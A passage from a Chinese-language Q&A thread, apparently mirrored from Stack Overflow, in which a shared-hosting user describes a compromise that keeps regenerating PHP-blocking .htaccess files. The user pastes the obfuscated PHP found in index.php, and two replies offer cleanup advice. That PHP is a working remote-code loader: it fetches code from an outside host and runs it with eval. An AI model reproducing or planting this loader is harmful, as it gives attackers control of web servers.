php 在文件目录中重复创建.htaccess文件

3vpjnl9f 于 2023-09-29 发布在 PHP

关注(0)|答案(2)|浏览(99)

我有大约10个网站在一个共享主机。最近我注意到有这么多.htaccess文件被创建并限制用户访问。

<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>

上面的代码块是用所有代码. htaccess编写的。当我删除那些时，它似乎又重新生成了。这意味着应该有一个脚本运行在包的其他地方。我甚至安装了Wordfence插件来识别更新的文件。我恢复了最近的修改，这似乎是恶意的。但仍然没有变化。在下面的index.php文件中也有一些编码的代码行。

<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>

除了删除每个目录的.htaccess外，我没有其他选择。但这解决不了问题除了清空我的文件管理器，我还能做什么呢？

php

来源：https://stackoverflow.com/questions/70111542/htaccess-files-are-repeatedly-being-created-in-file-directory

2条答案

按热度按时间

gfttwv5a1#

整个软件包都被黑了我什么也做不了。就像其他人建议的那样，我花了2天时间逐一清除自动生成的文件。它被删除了，第二天就出现了。一些脚本可能在创建文件的后台运行。所以唯一的解决办法是;
1.联系主机提供商，并要求他们完全清理目录，并从头开始。或
1.联系网络安全分析师，并支付他们清除它的费用约199美元，最少。
是的，狗屎发生了！

赞(0）回复(0）举报 2023-09-29

nc1teljy2#

首先，找到通常存在于不同目录中的可疑文件，打开它，并分析代码。一旦确认该文件是病毒或恶意软件，复制文件名并通过cpanel中的搜索字段进行搜索。验证内容并从主机目录中删除该文件的每个示例。重复该过程，直到您注意到不再发生再生。

赞(0）回复(0）举报 2023-09-29